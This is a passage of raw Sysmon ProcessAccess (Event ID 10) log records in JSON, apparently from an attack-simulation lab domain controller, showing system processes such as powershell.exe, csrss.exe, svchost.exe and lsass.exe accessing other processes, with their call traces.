ad\\System.Management.Automation.ni.dll+eca6ba9b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfa14e7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfa0ab7","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","SourceProcessId":"4984","SourceThreadId":"4796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001053D70700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ecb198db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfba9b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfba686|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+eca6ba9b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebf7b21c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfd96eb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbcd50|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbcd50|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbcbe1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfaeb66|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbb099|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbac8c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfba9b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfba686|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+eca6ba9b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfa14e7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfa0ab7","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5355,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001053D70700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001053D70700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5356,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5357,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5358,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5359,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5360,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5361,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
